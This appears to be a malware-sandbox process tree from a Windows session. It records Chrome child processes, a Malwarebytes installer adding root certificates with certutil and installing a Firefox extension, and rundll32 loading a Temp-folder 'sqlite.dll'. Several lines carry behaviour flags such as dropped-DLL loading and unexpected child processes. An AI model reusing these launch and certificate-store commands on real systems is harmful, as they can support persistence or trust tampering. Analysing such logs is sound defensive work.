C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4288 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4436 /prefetch:82⤵
- Modifies Internet Explorer settings
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4400 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4400 /prefetch:82⤵
- Loads dropped DLL
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6132 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6124 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:12⤵
-
-
C:\Users\Admin\Downloads\MBSetup-119967.119967-consumer.exe"C:\Users\Admin\Downloads\MBSetup-119967.119967-consumer.exe"2⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /t 1 & "C:\Program Files\Mozilla Firefox\firefox.exe" -install -extension "C:\Users\Admin\AppData\Local\Temp\{242af0bb-db11-4734-b7a0-61cb8a9b20fb}.xpi"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -install -extension "C:\Users\Admin\AppData\Local\Temp\{242af0bb-db11-4734-b7a0-61cb8a9b20fb}.xpi"4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -install -extension C:\Users\Admin\AppData\Local\Temp\{242af0bb-db11-4734-b7a0-61cb8a9b20fb}.xpi5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.0.1623487128\1544531716" -parentBuildID 20200403170909 -prefsHandle 1460 -prefMapHandle 1480 -prefsLen 1 -prefMapSize 219631 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 1584 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.3.1531552324\1232408870" -childID 1 -isForBrowser -prefsHandle 2304 -prefMapHandle 2364 -prefsLen 122 -prefMapSize 219631 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 2380 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.13.1690225064\1686392870" -childID 2 -isForBrowser -prefsHandle 3244 -prefMapHandle 3240 -prefsLen 6979 -prefMapSize 219631 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 3256 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.20.937386252\483011415" -childID 3 -isForBrowser -prefsHandle 4144 -prefMapHandle 3896 -prefsLen 7907 -prefMapSize 219631 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 4044 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.27.785906920\1872521040" -childID 4 -isForBrowser -prefsHandle 2248 -prefMapHandle 2244 -prefsLen 7907 -prefMapSize 219631 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 3448 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6460.34.1009426338\815282376" -childID 5 -isForBrowser -prefsHandle 5248 -prefMapHandle 5472 -prefsLen 11632 -prefMapSize 219631 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6460 "\\.\pipe\gecko-crash-server-pipe.6460" 4168 tab6⤵
-
-
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6572 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6560 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5184 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5924 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4588 /prefetch:82⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4372 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1872 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4400 /prefetch:82⤵
- Modifies registry class
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1524 /prefetch:12⤵
-
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x43c1⤵
-
C:\Users\Admin\AppData\Local\Temp\MBAMInstallerService.exe"C:\Users\Admin\AppData\Local\Temp\MBAMInstallerService.exe"1⤵
-
C:\Windows\system32\certutil.execertutil.exe -f -addstore root "C:\Windows\TEMP\MBInstallTemp\servicepkg\BaltimoreCyberTrustRoot.crt"2⤵
-
-
C:\Windows\system32\certutil.execertutil.exe -f -addstore root "C:\Windows\TEMP\MBInstallTemp\servicepkg\DigiCertEVRoot.crt"2⤵
-
-
C:\Windows\system32\certutil.execertutil.exe -f -addstore root "C:\Windows\TEMP\MBInstallTemp\servicepkg\starfieldrootcag2_new.crt"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"2⤵
-
-
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatr.exe"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatr.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no2⤵
-
-
C:\Users\Admin\AppData\LocalLow\IGDump\ewhfplyyuljhxllxrnixzkjkckavsgjf\ig.exeig.exe secure2⤵
-
-
C:\Windows\system32\WerFaultSecure.exeC:\Windows\system32\WerFaultSecure.exe -u -p 6736 -s 46642⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x44c1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
